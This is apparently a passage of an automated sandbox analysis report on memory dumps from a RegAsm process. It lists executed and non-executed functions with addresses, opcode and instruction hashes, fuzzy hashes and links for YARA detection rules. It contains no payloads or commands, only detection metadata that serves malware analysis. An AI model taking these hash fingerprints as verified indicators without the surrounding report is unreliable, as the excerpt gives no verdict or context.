                                                      • Instruction ID: 039d854b10da49c552e68e13fabc4e93713657037848ca5c407544480b2a1506
                                                      • Opcode Fuzzy Hash: 9a9193d0b46e0e2139bb8c1f3c6cda7ea7821c56f935ce304348813a49c0d970
                                                      • Instruction Fuzzy Hash: 5AE065306047654FC721B729E4097AF7FE6DF85215F04052DD2478B645CBB17D078792
                                                      Function 068F5698 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ecbb9bbc5d9d4fe7d8873c118a08c989b36c2b162149a14117ed7be1f0cd6c0a
                                                      • Instruction ID: 69ce235c0817aed7873a493b8d8657b24b98dc6578b9f898410dab58cedf9517
                                                      • Opcode Fuzzy Hash: ecbb9bbc5d9d4fe7d8873c118a08c989b36c2b162149a14117ed7be1f0cd6c0a
                                                      • Instruction Fuzzy Hash: 27E092B210C3009FD3049F60E80585BBBA4EB95220B15886EE550C7191E771E842C795
                                                      Function 068FCE88 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aad6c6b4ba6c1489d6505dc2fd1d317b30cd4c3b60f19bc46b150aebe2e4bdd5
                                                      • Instruction ID: c493a09594ba6425948d92bdd9b3b5128dc3e8167a0fe8c33df06f74198d8a18
                                                      • Opcode Fuzzy Hash: aad6c6b4ba6c1489d6505dc2fd1d317b30cd4c3b60f19bc46b150aebe2e4bdd5
                                                      • Instruction Fuzzy Hash: 93E026705063A4EFDF5AFB30F90869A3FA5AF02A10B000299EC41CB60BD7344D47C392
                                                      Function 068FE8F8 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f02c0306630f1ae8526c61212a72367786c77db36c5d7ec94438b7b1bf0aafa
                                                      • Instruction ID: 4071fc305f92d3da4bd5c27d90153e73550a83f9cf3f04a346ebb81c651a274f
                                                      • Opcode Fuzzy Hash: 1f02c0306630f1ae8526c61212a72367786c77db36c5d7ec94438b7b1bf0aafa
                                                      • Instruction Fuzzy Hash: 99E0123D125248AFC7129B55DD40CD63F7ABF4A61430840C9F5418F673C7219965DBB1
                                                      Function 0701BA63 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adb10016993595883d02f7d95b29904f681ef41fef93cc86cc444019a8533269
                                                      • Instruction ID: d184d89d9505c6b79167799a12d05a13be6fec694a03c8033b45471e378da1b5
                                                      • Opcode Fuzzy Hash: adb10016993595883d02f7d95b29904f681ef41fef93cc86cc444019a8533269
                                                      • Instruction Fuzzy Hash: 31E072B22083288BC306AB68A8011D67FEBDFC6100B0AC1ABE809C3202CB60480087E2
                                                      Function 068FE1FF Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f386f02a9696d5aeb6e37eeeaf17d74bffea802bb2788d06da873d966f297bc
                                                      • Instruction ID: bee5621cef3d77d90918859f139bbc46ea08690371ca90558cc8d8d581e0828c
                                                      • Opcode Fuzzy Hash: 5f386f02a9696d5aeb6e37eeeaf17d74bffea802bb2788d06da873d966f297bc
                                                      • Instruction Fuzzy Hash: E2E0DF71E0A218EFCB01EFA4EC4089D3FF29B8251172042DAE809D72A1D5300F16CB52
                                                      Function 068FAC80 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ffb5578716ccce6d7d6689a944b25dda80c7eb2090d9f5473e2b23f79ed4613
                                                      • Instruction ID: cdba53fb41887c4905cb476f9cf055d63c64b3c042b5837fc4a105f6c684d7be
                                                      • Opcode Fuzzy Hash: 5ffb5578716ccce6d7d6689a944b25dda80c7eb2090d9f5473e2b23f79ed4613
                                                      • Instruction Fuzzy Hash: A3D05E3130522A6B8A153B69F4184AE7BEBEAC5A72304403EE70BC7A44CE752D4687D6
                                                      Function 068FB510 Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 281390fcd3fc1135421a48fda42e319c634d90e81105fcb6ed782ecab18fd4d7
                                                      • Instruction ID: 343944250b1fda5bdd9761872507aac63802dc17a1c1aa73e6a232abc352e9e5
                                                      • Opcode Fuzzy Hash: 281390fcd3fc1135421a48fda42e319c634d90e81105fcb6ed782ecab18fd4d7
                                                      • Instruction Fuzzy Hash: C4E07575D0020DEFCB40EFA4D9448DDBBB9EB48200F1082A6D905A3200EA315F569B80
                                                      Function 068FE280 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90cfa1b89070de58024cfa47d6ae2024d3ee611dc1ce4f2599d05ec61e14925f
                                                      • Instruction ID: 477ae433cf9d6addf33c127440495b00c8bcd5d2a295804fcf49eb8cd55f17bd
                                                      • Opcode Fuzzy Hash: 90cfa1b89070de58024cfa47d6ae2024d3ee611dc1ce4f2599d05ec61e14925f
                                                      • Instruction Fuzzy Hash: C8E04F30900721CFDB58FA21E90764977E1F758A14F000218D9224B669D7702A5B8BC2
                                                      Function 068FE210 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2649b1e5ea92b09b34a5581d9e169881c742ed6a84497ad1c0e1791e3923702a
                                                      • Instruction ID: 8085af136c3a75d22340d5ddf8196b027d4a73ec8e0480ad841fcf84bdf9ed18
                                                      • Opcode Fuzzy Hash: 2649b1e5ea92b09b34a5581d9e169881c742ed6a84497ad1c0e1791e3923702a
                                                      • Instruction Fuzzy Hash: E9D017B1A0120CFF8B40FFA9E90095DBBF9EB45615B1085A99509E7204EA312F019B91
                                                      Function 0701BA70 Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0105f6b3e083a61243c4b9a69f4d63e97c3bf0a17d034e8e8cbe10b432083353
                                                      • Instruction ID: 218b66a125d23fafc3f0705fed29127dc99e597653725ccda2d914222910d625
                                                      • Opcode Fuzzy Hash: 0105f6b3e083a61243c4b9a69f4d63e97c3bf0a17d034e8e8cbe10b432083353
                                                      • Instruction Fuzzy Hash: 71D0C97261472887C708AA5AA804596BBDFEBC9621B04C16AD90AC3659DAB098008BD1
                                                      Function 068FF8EB Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ccd4dcf6527718bbf89eb1d9985c41af120ebf9ed43aaa394e6260ac8ea2ccd
                                                      • Instruction ID: b72b9aeeb20f96cd65eea2311e53792527ff27ed2689fd519b1cda79f6003a94
                                                      • Opcode Fuzzy Hash: 5ccd4dcf6527718bbf89eb1d9985c41af120ebf9ed43aaa394e6260ac8ea2ccd
                                                      • Instruction Fuzzy Hash: 85C01272B000200F8784BAAC701816D6AD792D85B3385407FEA0EC3388CD708C428380
                                                      Function 068F3721 Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eda7b5004519205ed528220ed19391b97fca96d11d4e54bc2adc8bc53e76b629
                                                      • Instruction ID: 29fe43a493ac55cd38e7c49180729e71106ad6097033f3e84d4be37a4efd7a80
                                                      • Opcode Fuzzy Hash: eda7b5004519205ed528220ed19391b97fca96d11d4e54bc2adc8bc53e76b629
                                                      • Instruction Fuzzy Hash: 3AC02B7111A3800FE30203609C07E983F309792B00B076083EF51CB1C7C5406009DBB6
                                                      Function 068FDFD1 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77b95f62d5d86c083c55a64df208840d1d5b0ebfe867ddf7e966347709f2459d
                                                      • Instruction ID: d458dc73fe4b6cc0f06b68377d228063396b187b0554ded70b1ceb28e0ace2d1
                                                      • Opcode Fuzzy Hash: 77b95f62d5d86c083c55a64df208840d1d5b0ebfe867ddf7e966347709f2459d
                                                      • Instruction Fuzzy Hash: D8C04C6194A3904EDF4617A0991D5453F215F4372471500C6A6819A066C6110406C752

                                                      Non-executed Functions

                                                      Function 07016518 Relevance: 5.5, Strings: 4, Instructions: 496COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q$$q$$q
                                                      • API String ID: 0-4102054182
                                                      • Opcode ID: 488bd23a3da9f7b23e4288e52b9f26bf3db400a41dc41012d620e37be52c3d37
                                                      • Instruction ID: fd7c6e87664d7940f8adc14454b5657198458f5f9579a5700c78e4e6c3e73134
                                                      • Opcode Fuzzy Hash: 488bd23a3da9f7b23e4288e52b9f26bf3db400a41dc41012d620e37be52c3d37
                                                      • Instruction Fuzzy Hash: A832A0B0E01228CFDB64DF65C854BDEB7B2BB89300F5095EAD50AAB254DB359E81CF50
                                                      Function 07017050 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q$$q$$q
                                                      • API String ID: 0-4102054182
                                                      • Opcode ID: 6342518d78a9042a4aa0ec049c6f18cc46c60bf6e168b4aab72410315773a9e0
                                                      • Instruction ID: 85745d5fb50f893c745f7a09a6587e25d83b0357847d43b615c4001376fad1c4
                                                      • Opcode Fuzzy Hash: 6342518d78a9042a4aa0ec049c6f18cc46c60bf6e168b4aab72410315773a9e0
                                                      • Instruction Fuzzy Hash: 98C1C5B0E00219CFDB64DFA9C944B9EBBB2FF89300F5091A9D409AB254DB345986CF51
                                                      Function 07015A98 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LRq$PHq
                                                      • API String ID: 0-2204820668
                                                      • Opcode ID: 1fc5725a34191c6b90e80b726986ebae95831eff5cf811fc61cd236f528e0776
                                                      • Instruction ID: a737765cbac0067f8dde7808018af6e8c2f702275d101172f4c32ac02d128428
                                                      • Opcode Fuzzy Hash: 1fc5725a34191c6b90e80b726986ebae95831eff5cf811fc61cd236f528e0776
                                                      • Instruction Fuzzy Hash: A8A1C4B4E01318CFDB68DFA5C854B9EBBB2BF89300F5085A9D41AAB354DB305A85CF51
                                                      Function 070189E0 Relevance: 2.7, Strings: 2, Instructions: 203COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q
                                                      • API String ID: 0-3126353813
                                                      • Opcode ID: 1f709def7494ddf9593b6a2f4df5faa19889f1ff8f05305c080193e5c13e0c81
                                                      • Instruction ID: 024ce2ef39e2e15bb90825a6d5fb47af2be528874edb492f9ca31ef062e5f355
                                                      • Opcode Fuzzy Hash: 1f709def7494ddf9593b6a2f4df5faa19889f1ff8f05305c080193e5c13e0c81
                                                      • Instruction Fuzzy Hash: 0991D2B4E01218CFDB28DFA9D584A9DBBF2FF89301F608569D409AB354DB359982CF10
                                                      Function 068F6FE8 Relevance: .8, Instructions: 783COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: caef9280d149a60598dbaf00b4d226276f6caed64c79391228fbf94720c5d5b3
                                                      • Instruction ID: a8e3c53f28141d5d6f6097428ec77eaf78300d1393e766e1b4e50b7c06f545d9
                                                      • Opcode Fuzzy Hash: caef9280d149a60598dbaf00b4d226276f6caed64c79391228fbf94720c5d5b3
                                                      • Instruction Fuzzy Hash: 3D625FB06003009FE788DF59D45871A7EE6EF94318F64C89CC1099F399DBB6E90B8B95
                                                      Function 068F6FF8 Relevance: .8, Instructions: 780COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cac78783f0b9eb968d60970db3a656c0db1218339f09de4a21c4b1810f8a536
                                                      • Instruction ID: 7ba8fef4a334e038ef36bf6a8a4296d6988fb90fb09924eb88947b8b8cae3cdf
                                                      • Opcode Fuzzy Hash: 3cac78783f0b9eb968d60970db3a656c0db1218339f09de4a21c4b1810f8a536
                                                      • Instruction Fuzzy Hash: 42625FB06003009FE788DF59D45871A7EE6EF94318F64C89CC1099F399DBB6E90B8B95
                                                      Function 070144D8 Relevance: .5, Instructions: 525COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c93206c47161da1c8d423509d48cb23cf85c3f31672047f5181ff7c75fddb89c
                                                      • Instruction ID: 797b33b927ba91ae0aceee6f117e9ebdd808a33345b3d52e3002e6cbf8dcd14f
                                                      • Opcode Fuzzy Hash: c93206c47161da1c8d423509d48cb23cf85c3f31672047f5181ff7c75fddb89c
                                                      • Instruction Fuzzy Hash: 2E42BEB4E012288FDB64DF65C854BEEBBB2BF89300F5081EAD50AA7254DB355E85CF40
                                                      Function 070120A0 Relevance: .4, Instructions: 426COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a404c24f9616501ad0d1d26b622a673ca7637e76dcdceefa9b194c3e0de4671
                                                      • Instruction ID: 4fe937fc450c6d8097daa1b3ac6222cda55c879fe584ff906729f571c9e5af74
                                                      • Opcode Fuzzy Hash: 3a404c24f9616501ad0d1d26b622a673ca7637e76dcdceefa9b194c3e0de4671
                                                      • Instruction Fuzzy Hash: F9228EB4E012298FDB65DF69C890BDDB7B2BF49300F1081EAD549A7250EB349E85CF90
                                                      Function 070106B8 Relevance: .4, Instructions: 400COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 595db11a947569f64de9f1de4158034a459916c4b6d324afafcf42a23e04d2cf
                                                      • Instruction ID: b0462bfa07f10649ff647411b42728c35c5acb3875c809b0ecf45f65ea62241e
                                                      • Opcode Fuzzy Hash: 595db11a947569f64de9f1de4158034a459916c4b6d324afafcf42a23e04d2cf
                                                      • Instruction Fuzzy Hash: DE225AB4E012288FDB64DF69C994BDDBBB2BB49300F1081EAD549AB354DB359E81CF50
                                                      Function 070116C8 Relevance: .4, Instructions: 363COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a578414117f6e24b8e89e2d12c2e70e6741c734b3295feeaa88592891abadaee
                                                      • Instruction ID: b39304f5d4d8c48824a1ee675d1dd2a15d15e8718c31abd729bb02db4d3a0c4a
                                                      • Opcode Fuzzy Hash: a578414117f6e24b8e89e2d12c2e70e6741c734b3295feeaa88592891abadaee
                                                      • Instruction Fuzzy Hash: 5E029074A01228CFDBA8DF65C854B9DBBB2BF89300F1085E9D509A7354DB319E85CF51
                                                      Function 07013730 Relevance: .3, Instructions: 332COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa68ca257871eeeeab31bef29902fdae446cfc5a9a248c38a7d5abf7361b7ab2
                                                      • Instruction ID: 773af6fc3d86dc591d986f340a03ee4684a5ac3753f908232969d072724f4ee8
                                                      • Opcode Fuzzy Hash: aa68ca257871eeeeab31bef29902fdae446cfc5a9a248c38a7d5abf7361b7ab2
                                                      • Instruction Fuzzy Hash: F9F19074E01228CFDB68DF65C850B9EBBB2BF89300F6085A9D509AB354DB319E81DF51
                                                      Function 05540040 Relevance: .3, Instructions: 315COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ceb23cce50145331d9f1e1e927849f80ea5ebfe2846b3c79aabeb0aaf5802a4
                                                      • Instruction ID: 5964a82cfe9704fe721a7d7e43523e5b62f192fa4d0af3900d7f4c3519180593
                                                      • Opcode Fuzzy Hash: 5ceb23cce50145331d9f1e1e927849f80ea5ebfe2846b3c79aabeb0aaf5802a4
                                                      • Instruction Fuzzy Hash: AB1280B1422745CAE730CF65E95E28E3FE9BB8132CF904209E2616E2E5DFB4155ACF44
                                                      Function 07011260 Relevance: .3, Instructions: 287COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5338175d39ad107aee0e53999cd18e3423157f89e1d774db2359479412cc2e50
                                                      • Instruction ID: 55b16fe8aeacf2cf2db6e5b7618e58461ec7693b21e942e2b76de437f5d9548f
                                                      • Opcode Fuzzy Hash: 5338175d39ad107aee0e53999cd18e3423157f89e1d774db2359479412cc2e50
                                                      • Instruction Fuzzy Hash: 3FD18FB4E01218CFDB58DFA9D984B9DBBF2BF89300F1091A9D509AB355DB319985CF10
                                                      Function 070153A0 Relevance: .3, Instructions: 286COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0528361ef50b8f5371c815df66760f52c7d76adfab03ab4ff4996ab8df3a1aee
                                                      • Instruction ID: 45116c90fe73fcf1b14b3fa2d1b67ca6e815e540228f63e264bb92e31138ceb6
                                                      • Opcode Fuzzy Hash: 0528361ef50b8f5371c815df66760f52c7d76adfab03ab4ff4996ab8df3a1aee
                                                      • Instruction Fuzzy Hash: AED190B4E01218CFDB64DFA5D894B9DBBB2BF89301F2085AAD409AB354DB305E85CF50
                                                      Function 07013D70 Relevance: .3, Instructions: 271COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4589a642e90c6e52af5dc9c488a4a1f3d141b61412f84e04015524f6db16466a
                                                      • Instruction ID: 9defdf908dd94d4ba4f3dad4493d272ab41ede273a73c0c5b920704a0053e3ff
                                                      • Opcode Fuzzy Hash: 4589a642e90c6e52af5dc9c488a4a1f3d141b61412f84e04015524f6db16466a
                                                      • Instruction Fuzzy Hash: B3C1E6B0D01229CBDB68DF69C850BDEBBB2BF89300F5081EAD509A7254DB755E85CF50
                                                      Function 07012BC0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1ef4998ae17c2af0102db5713d593843da2c06d0d0fcd8850b61dc2720c47d1
                                                      • Instruction ID: 9c94399cf71fea650f78f4134ca060dfc78a715ff6cb4693c200a84ef4a32854
                                                      • Opcode Fuzzy Hash: c1ef4998ae17c2af0102db5713d593843da2c06d0d0fcd8850b61dc2720c47d1
                                                      • Instruction Fuzzy Hash: DDC17074E01218DFDB64DFA9D850B9DBBB2FF89300F1085AAD419AB354DB359982CF50
                                                      Function 0537DC74 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e47328c1d8d55ea71ff93e47716597c5a91eaea10f45c39212de561d81e282a4
                                                      • Instruction ID: 2cb63a341248fbab93c0e2f3d86afae2ca3b59dbd0d91c2cb3ff23cd39b6e57e
                                                      • Opcode Fuzzy Hash: e47328c1d8d55ea71ff93e47716597c5a91eaea10f45c39212de561d81e282a4
                                                      • Instruction Fuzzy Hash: 34A16F36E0021ACFCF25DFB5C4445AEB7B2FF84300B15856AE806AF265DB75E955CB40
                                                      Function 07012BD0 Relevance: .3, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16ede4cb82dad3df0d5a499c1431b10cdfa4daa74d127b4dbf3ae5204c30e4af
                                                      • Instruction ID: 0bb78a3791162ac7bda94e86ef31bdf1f395e80f893279d011f6fe8840f148be
                                                      • Opcode Fuzzy Hash: 16ede4cb82dad3df0d5a499c1431b10cdfa4daa74d127b4dbf3ae5204c30e4af
                                                      • Instruction Fuzzy Hash: 96C16074E01218CFDB68DFA9D850B9DBBB2FF89300F1085AAD419AB354DB359986CF50
                                                      Function 05540006 Relevance: .2, Instructions: 239COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
